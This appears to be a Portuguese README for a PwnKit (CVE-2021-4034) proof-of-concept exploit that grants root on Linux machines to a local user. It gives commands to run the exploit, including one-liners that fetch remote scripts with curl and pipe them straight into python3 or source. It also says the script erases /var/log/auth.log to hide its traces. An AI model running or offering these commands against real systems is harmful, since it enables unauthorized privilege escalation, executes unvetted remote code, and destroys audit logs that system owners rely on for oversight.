
Um PoC em python3 e bash para o CVE-2021-4034 por Kim Schulz
██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██╔╝██║ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║ ██╗╚███╔███╔╝██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
Um PoC em Python3 e BASH para CVE-2021-4034 por Kim Schulz
Este é um PoC simples para o erro do Polkit recentemente encontrado chamado PwnKit.
Eu o fiz tanto como script bash quanto python3 - apenas pela diversão.
O problema é muito simples de explorar, mas tem consequências enormes, pois facilmente concede acesso root na maioria das máquinas Linux onde o atacante tem acesso de usuário local.
Estes scripts são de execução única, então simplesmente faça
python3 pkwner.py
ou
bash pkwner.sh
Você também pode executá-lo diretamente de um servidor web (por exemplo, este repositório do github) via:
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)
ou
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))
Em ambos os casos, deve parecer algo assim:
e

O script criará alguns arquivos e pastas, mas fará a limpeza após si mesmo quando o shell root for aberto - ele até limpará o /var/log/auth.log (porque não?).